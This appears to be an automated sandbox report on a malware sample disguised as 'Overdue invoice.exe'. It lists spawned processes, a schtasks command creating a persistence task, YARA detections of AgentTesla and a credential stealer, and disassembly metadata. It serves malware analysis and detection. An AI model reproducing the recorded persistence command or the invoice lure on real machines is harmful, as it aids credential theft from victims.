                                                                        Target ID:3
                                                                        Start time:12:53:33
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                                                                        Imagebase:0xf00000
                                                                        File size:185856 bytes
                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:4
                                                                        Start time:12:53:34
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7c9170000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:5
                                                                        Start time:12:53:34
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:{path}
                                                                        Imagebase:0x2f0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        Target ID:7
                                                                        Start time:12:53:35
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xfe0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Target ID:15
                                                                        Start time:12:53:53
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                                        Imagebase:0x8d0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 60%, ReversingLabs
                                                                        Reputation:low

                                                                        Target ID:16
                                                                        Start time:12:54:01
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                                        Imagebase:0x830000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Target ID:17
                                                                        Start time:12:54:05
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                                                                        Imagebase:0xf00000
                                                                        File size:185856 bytes
                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:18
                                                                        Start time:12:54:06
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7c9170000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Target ID:19
                                                                        Start time:12:54:06
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xbe0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                          Execution Graph

                                                                          Execution Coverage:11.9%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:7%
                                                                          Total number of Nodes:215
                                                                          Total number of Limit Nodes:13

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !l\$QO$S$e$%j$lYQ$iE9
                                                                          • API String ID: 0-3094461243
                                                                          • Opcode ID: 9c5b19cb6c3f84ea73d583627d18be775ecc6a02a3170ef1e85021a6efb23c52
                                                                          • Instruction ID: 2b10a5742fea4ae89a9a7a6d4992001715258e1c37c82f17474e988ed09b2adf
                                                                          • Opcode Fuzzy Hash: 9c5b19cb6c3f84ea73d583627d18be775ecc6a02a3170ef1e85021a6efb23c52
                                                                          • Instruction Fuzzy Hash: 30D19070A25245DFDB14EFA5D98899DBBF2FF48705B14C46AE409EB3A4DB30A890CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph
                                                                          [Rendered graph data; executed and not-executed blocks are distinguished only in the rendered image.] Function at 0x7266369-0x7266848 in the 0x7260000 region: block 0x726648a calls 0x7266a12 or 0x7266a20, and block 0x72664b5 fans out to some two dozen successor blocks that all return to 0x7266497. No imported API calls appear in the graph.
                                                                          Strings
                                                                          • d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,", xrefs: 072665B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,"
                                                                          • API String ID: 0-832420553
                                                                          • Opcode ID: 66c4c34c7bb3b5fccb3e44661f9c2b8423093db3a8db5304d0c8276fd1793680
                                                                          • Instruction ID: e2bfdc2156771154349b8da889bb6587615402a722c6fd72372fd7415318ace5
                                                                          • Opcode Fuzzy Hash: 66c4c34c7bb3b5fccb3e44661f9c2b8423093db3a8db5304d0c8276fd1793680
                                                                          • Instruction Fuzzy Hash: B6E18BB5A2820ADFCB14CFA5D4858EEFBB2FF89311F10855BD405AB254D734A982CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph
                                                                          [Rendered graph data; executed and not-executed blocks are distinguished only in the rendered image.] Function at 0x7266329-0x7266848 in the 0x7260000 region, an alternate entry into the same body as the graph above: block 0x726648a calls 0x7266a12 or 0x7266a20, and block 0x72664b5 fans out to some two dozen successor blocks that all return to 0x7266497. No imported API calls appear in the graph.
                                                                          Strings
                                                                          • d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,", xrefs: 072665B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,"
                                                                          • API String ID: 0-832420553
                                                                          • Opcode ID: 713a49118d3f5b0aaf329e266d9c42188f4fc88a4413f579405d07980f0eee66
                                                                          • Instruction ID: 9666f64853746ca4fb2c12cd8de4efbef42f7965321fba74630c31e0b2b759ed
                                                                          • Opcode Fuzzy Hash: 713a49118d3f5b0aaf329e266d9c42188f4fc88a4413f579405d07980f0eee66
                                                                          • Instruction Fuzzy Hash: CBE19BB5A2820ADFCB14CFA5D4858EEFBB2FF89311F10855BD405AB254D734A982CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,", xrefs: 072665B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,"
                                                                          • API String ID: 0-832420553
                                                                          • Opcode ID: 7608a95375236c4cb3b22e9c66c2fe5b33aa681a4d6a100f38466f879ed4f232
                                                                          • Instruction ID: 71efcf3ed19c8b1d52dbcaeb07bee2f21f4a41de27bd86d0b3840327f423da04
                                                                          • Opcode Fuzzy Hash: 7608a95375236c4cb3b22e9c66c2fe5b33aa681a4d6a100f38466f879ed4f232
                                                                          • Instruction Fuzzy Hash: F3D129B4D2420ADFCB14CF96C5858AEFBB6FF89300F14C55AD416AB254D734AA82CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1v{i
                                                                          • API String ID: 0-3238669819
                                                                          • Opcode ID: 81b83a723897fda3614e7cef32ccfb2779bc44f2bdb064d7ef468a3dbb3aade0
                                                                          • Instruction ID: eda3ada1bc4ca23d4ef06b64efe565b09032b09be1a3d9a6ac63af8d599a9257
                                                                          • Opcode Fuzzy Hash: 81b83a723897fda3614e7cef32ccfb2779bc44f2bdb064d7ef468a3dbb3aade0
                                                                          • Instruction Fuzzy Hash: E2A13875E102588FCB08DFE9D8846DEBBB2EF89310F24942AD419BB355D7349A82CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: k3bo
                                                                          • API String ID: 0-1636335931
                                                                          • Opcode ID: 22a6734c040f1b54ebcaa84d0e48cb4737470bb900ee2bc06e1ae325b8e16129
                                                                          • Instruction ID: 7c890c177ddb41ad06e5ae275d94891db97fee9db08cfc5f844a6eb3f8e95921
                                                                          • Opcode Fuzzy Hash: 22a6734c040f1b54ebcaa84d0e48cb4737470bb900ee2bc06e1ae325b8e16129
                                                                          • Instruction Fuzzy Hash: A7B137B0F256598BCF04CFE9C5896DEFBF2AF89310F14C52AD408AB255E7349981CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1v{i
                                                                          • API String ID: 0-3238669819
                                                                          • Opcode ID: 8865c865d65f395d4b737c0b6308cc8e1d268f41890b591b724e8a392cd4f067
                                                                          • Instruction ID: 43d7ebe0e9b9c98a7f92884453816a546c72719d73063de5ceac929e6ab47edc
                                                                          • Opcode Fuzzy Hash: 8865c865d65f395d4b737c0b6308cc8e1d268f41890b591b724e8a392cd4f067
                                                                          • Instruction Fuzzy Hash: 8391D2B4E242598FCB08DFE9C984AEEFBB2EF89340F24902AD419BB254D7745941CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ['_v
                                                                          • API String ID: 0-2215613000
                                                                          • Opcode ID: f2eef15a19e516950fecc1f99284a0c4a661345179f6effdf2949dd3dae17776
                                                                          • Instruction ID: 1f9e09e2bf2f8feb8bc5ab4230ba3e645962cdf46428e81bb8f466667e1f8493
                                                                          • Opcode Fuzzy Hash: f2eef15a19e516950fecc1f99284a0c4a661345179f6effdf2949dd3dae17776
                                                                          • Instruction Fuzzy Hash: 71616C70D1620CDFDB05CFE9E6806DDFBB6BB89311F64A52AD009B7255E3348946CB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ['_v
                                                                          • API String ID: 0-2215613000
                                                                          • Opcode ID: e74eb198530bada359a5197a5c7fd1c56ad50f57f71d5b2990679c3e643e1c87
                                                                          • Instruction ID: 264f51c25498c3ee70a5b9b3444c1b7867c30cc564b271be4c20abed7813f27c
                                                                          • Opcode Fuzzy Hash: e74eb198530bada359a5197a5c7fd1c56ad50f57f71d5b2990679c3e643e1c87
                                                                          • Instruction Fuzzy Hash: AE617B70D1620CEBDB05CFE9E5806DDFBB6FB89311F64A42AD009B7255E7349942CB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ;N9a
                                                                          • API String ID: 0-1213979650
                                                                          • Opcode ID: 039d61a8a714da9dd26bb5ed2e05412456f4f829c2b2d14964a8d63568884c6d
                                                                          • Instruction ID: 4e8b0c007f45c8a423b1ede8a6527bf44f80e3d4205b82dd4ded2a94ba9adae8
                                                                          • Opcode Fuzzy Hash: 039d61a8a714da9dd26bb5ed2e05412456f4f829c2b2d14964a8d63568884c6d
                                                                          • Instruction Fuzzy Hash: 1A5126B4E14259CFDB08DFAAD8446AEFBF2FF89300F14C16AD459A7250D7345A818F68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ;N9a
                                                                          • API String ID: 0-1213979650
                                                                          • Opcode ID: 451fa82793897303bb59ce40064bf5e951857f8c6c70495322d3c3a41994cfee
                                                                          • Instruction ID: 479604929cb0aeea66806b207a86fe74fb21077446bb76170309d2309aff45dc
                                                                          • Opcode Fuzzy Hash: 451fa82793897303bb59ce40064bf5e951857f8c6c70495322d3c3a41994cfee
                                                                          • Instruction Fuzzy Hash: 235114B4E14259CFDB08DFAAC8446AEFBF2BF89300F14C06AD419B7250D7345A818F68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5a0a0b79dc9431eef6897cd6bb2738ff28b5c85f118313ff17493b41ea973370
                                                                          • Instruction ID: 47643cefc2ff75ee3777ba8d0174a72270d860fb0700e2373a956fd98015b834
                                                                          • Opcode Fuzzy Hash: 5a0a0b79dc9431eef6897cd6bb2738ff28b5c85f118313ff17493b41ea973370
                                                                          • Instruction Fuzzy Hash: 72D1DBB0B142068FCB25DF78C88856EBBE6AF85204F2A846AD405DB396DF71DD81C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c7dab4c436d9773b76be3b2abe76bb2e2b2c3d3ef84d13cc07e44d57711edee
                                                                          • Instruction ID: 0499923d4da64df77361a251c4cf9693c4180f57d4b33578c2042b0860d8756b
                                                                          • Opcode Fuzzy Hash: 4c7dab4c436d9773b76be3b2abe76bb2e2b2c3d3ef84d13cc07e44d57711edee
                                                                          • Instruction Fuzzy Hash: AA21F5B1E106189BEB18CFABD8442DEFBF7AFC9310F14C06AD408A7258DB3419958F80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef2458b9c587317345c6d6aea3d2118018727c8392f1103e911db8ede6006ceb
                                                                          • Instruction ID: f30316d35b5edb53aa1536db07137831c08770d852472b6765d5d77da27dde6c
                                                                          • Opcode Fuzzy Hash: ef2458b9c587317345c6d6aea3d2118018727c8392f1103e911db8ede6006ceb
                                                                          • Instruction Fuzzy Hash: 5821E0B1E116189BEB58CFABD84469EF7F7AFC8200F04C576C408A7254DB3059868F51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks c2b523-c2b6df
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B590
                                                                          • GetCurrentThread.KERNEL32 ref: 00C2B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C2B663
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks c2b530-c2b6df
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B590
                                                                          • GetCurrentThread.KERNEL32 ref: 00C2B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C2B663
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks c2f900-c2fbc9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks c29530-c297a0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (image not preserved): basic blocks 27332fe-273351c
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0273345B
